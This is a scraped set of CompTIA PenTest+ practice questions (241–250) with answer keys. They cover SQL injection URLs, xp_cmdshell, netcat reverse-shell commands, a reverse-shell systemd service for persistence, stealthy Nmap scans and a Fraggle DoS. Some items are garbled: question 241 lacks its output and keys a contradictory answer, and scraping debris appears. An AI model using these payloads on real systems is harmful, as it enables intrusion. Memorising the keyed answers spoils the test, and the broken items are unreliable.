CompTIA PT0-002 Online Practice Questions and Exam Preparation

CompTIA PT0-002 Online Questions & Answers

• Question 241:

  A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

  

  However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?

  A. The HTTP port is not open on the firewall.
  B. The tester did not run sudo before the command.
  C. The web server is using HTTPS instead of HTTP.
  D. This URI returned a server error.
  A. The HTTP port is not open on the firewall.

  ---

  Explanation

• Question 242:

  A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

  http://company.com/catalog.asp?productid=22

  The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

  http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

  Which of the following should the penetration tester attempt NEXT?

  A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
  B. http://company.com/catalog.asp?productid=22' OR 1=1 -
  C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 -
  D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
  C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 -

  ---

  Explanation

  This URL will attempt a SQL injection attack using a UNION operator to combine the results of two queries into one table. The attacker can use this technique to retrieve data from other tables in the database that are not normally accessible through the web application.

• Question 243:

  An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

  A. nmap -"T3 192.168.0.1
  B. nmap - "P0 192.168.0.1
  C. nmap - T0 192.168.0.1
  D. nmap - A 192.168.0.1
  C. nmap - T0 192.168.0.1

  ---

  Explanation

• Question 244:

  During the reconnaissance phase, a penetration tester obtains the following output: Reply from 192.168.1.23: bytes=32 time<54ms TTL=128 Reply from 192.168.1.23: bytes=32 time<53ms TTL=128 Reply from 192.168.1.23: bytes=32 time<60ms TTL=128 Reply from 192.168.1.23: bytes=32 time<51ms TTL=128 Which of the following operating systems is MOST likely installed on the host?

  A. Linux
  B. NetBSD
  C. Windows
  D. macOS
  C. Windows

  ---

  Explanation

  The output shows the result of a ping command, which sends packets to a host and receives replies. The ping command can be used to determine if a host is alive and reachable on the network. One of the information that the ping command displays is the Time to Live (TTL) value, which indicates how many hops a packet can travel before it is discarded. The TTL value can also be used to guess the operating system of the host, as different operating systems have different default TTL values. In this case, the TTL value is 128, which is the default value for Windows operating systems. Linux and macOS have a default TTL value of 64, while NetBSD has a default TTL value of 255.

• Question 245:

  A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  A. Create a one-shot system service to establish a reverse shell.
  B. Obtain /etc/shadow and brute force the root password.
  C. Run the nc -e /bin/sh command.
  D. Move laterally to create a user account on LDAP
  A. Create a one-shot system service to establish a reverse shell.

  ---

  Explanation

  https://hosakacorp.net/p/systemd-user.html

  Creating a one-shot system service to establish a reverse shell is a technique that would best support maintaining persistence after reboot on a Linux-based file server. A system service is a program that runs in the background and performs various tasks without user interaction. A one-shot system service is a type of service that runs only once and then exits. A reverse shell is a type of shell that connects back to an attacker-controlled machine and allows remote command execution. By creating a one-shot system service that runs a reverse shell script at boot time, the penetration tester can ensure persistent access to the file server even after reboot.

• Question 246:

  A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute.

  Which of the following commands would allow the tester to finish the test without being blocked?

  A. nmap -sU -p 1-1024 10.0.0.15
  B. nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn
  C. nmap -T5 -p 1-65535 -A 10.0.0.15
  D. nmap -T3 -F 10.0.0.15
  B. nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

  ---

  Explanation

  The -T2 flag in Nmap sets the timing template to "polite", which means that Nmap will limit the number of parallel probes to 10 and the scan delay to 0.4 seconds. This will reduce the number of connections per minute and avoid triggering the

  active response tool. The -Pn flag tells Nmap to skip the host discovery phase and scan the target regardless of its ping response. The other options are not suitable for bypassing the active response tool, as they either scan too many ports (sU, -T5, -F) or use a faster timing template (-T5, -T3) that will generate more connections per minute.

  References:

  map Cheat Sheet 2024: All the Commands and Flags - StationX map Commands - 17 Basic Commands for Linux Network - phoenixNAP MAP Flag Guide: What They Are, When to Use Them - CBT Nuggets

• Question 247:

  A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

  Which of the following could be used for a denial-of- service attack on the network segment?

  A. Smurf
  B. Ping flood
  C. Fraggle
  D. Ping of death
  C. Fraggle

  ---

  Explanation

  Fraggle attack is same as a Smurf attack but rather than ICMP, UDP protocol is used. The prevention of these attacks is almost identical to Fraggle attack. Ref: https://www.okta.com/identity-101/fraggle-attack/

• Question 248:

  Which of the following is the most secure way to protect a final report file when delivering the report to the client/customer?

  A. Creating a link on a cloud service and delivering it by email
  B. Asking for a PGP public key to encrypt the file
  C. Requiring FTPS security to download the file
  D. Copying the file on a USB drive and delivering it by postal mail
  B. Asking for a PGP public key to encrypt the file

  ---

  Explanation

  Using PGP (Pretty Good Privacy) encryption ensures that the report file is securely encrypted with the client's public key. Only the client can decrypt the file using their private key, ensuring confidentiality during transit.

  Details:

  Option Analysis:

  uk.co.certification.simulator.questionpool.PList@1a6b7a80

  References: PGP encryption is a widely accepted method for securing sensitive data. It is recommended by many cybersecurity standards and best practice guides.

• Question 249:

  A penetration tester is testing input validation on a search form that was discovered on a website.

  Which of the following characters is the BEST option to test the website for vulnerabilities?

  A. Comma
  B. Double dash
  C. Single quote
  D. Semicolon
  C. Single quote

  ---

  Explanation

  A single quote (') is a common character used to test for SQL injection vulnerabilities, which occur when user input is directly passed to a database query. A single quote can terminate a string literal and allow an attacker to inject malicious SQL commands. For example, if the search form uses the query SELECT * FROM products WHERE name LIKE `%user_input%', then entering a single quote as user input would result in an error or unexpected behavior

• Question 250:

  A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.

  In which of the following places should the penetration tester look FIRST for the employees' numbers?

  A. Web archive
  B. GitHub
  C. File metadata
  D. Underground forums
  A. Web archive

  ---

  Explanation